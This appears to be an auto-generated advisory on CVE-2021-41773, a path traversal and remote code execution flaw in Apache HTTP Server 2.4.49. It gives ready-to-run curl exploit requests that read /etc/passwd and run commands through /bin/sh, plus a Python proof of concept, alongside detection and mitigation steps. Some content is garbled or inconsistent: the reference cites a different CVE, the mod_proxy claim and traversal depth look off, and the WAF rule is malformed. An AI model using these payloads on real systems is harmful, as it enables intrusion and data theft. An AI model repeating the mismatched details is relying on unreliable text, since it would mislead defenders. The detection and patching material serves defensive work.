How CVE-2021-41773 Works
A flaw in Apache HTTP Server 2.4.49 allows attackers to exploit path traversal, leading to remote code execution (RCE). The vulnerability occurs due to improper validation of URLs containing path traversal sequences (../). When `mod_proxy` is enabled, an attacker can bypass security checks and access files outside the document root. If CGI scripts are enabled, this can escalate to RCE by injecting malicious input. The issue stems from incomplete fixes in normalization logic, permitting crafted requests to leak system files or execute arbitrary commands.
DailyCVE Form
Platform: Apache HTTP Server
Version: 2.4.49
Vulnerability: Path Traversal → RCE
Severity: Critical
Date: 2021-10-05
What Undercode Say:
Exploitation:
1. Craft Malicious Request:
curl -v "http://target.com/cgi-bin/.%2e/%2e%2e/%2e%2e/etc/passwd"
2. RCE via CGI:
curl -X POST "http://target.com/cgi-bin/.%2e/%2e%2e/bin/sh" -d "echo;id"
Detection:
1. Check Apache Version:
apache2 -v
2. Log Analysis:
grep "../" /var/log/apache2/access.log
Mitigation:
1. Patch Immediately:
sudo apt update && sudo apt upgrade apache2
2. Disable CGI:
<Directory "/usr/lib/cgi-bin"> Options -ExecCGI </Directory>
3. WAF Rules:
location ~ .(..|\%2e\%2e) { deny all; }
PoC (Python):
import requests url = "http://target.com/cgi-bin/.%2e/%2e%2e/etc/passwd" response = requests.get(url) print(response.text)
Post-Exploitation Checks:
find /var/www -type f -perm -o+w -ls
References:
References:
Reported By: https://www.cve.org/CVERecord?id=CVE-2024-20439
Extra Source Hub:
Undercode
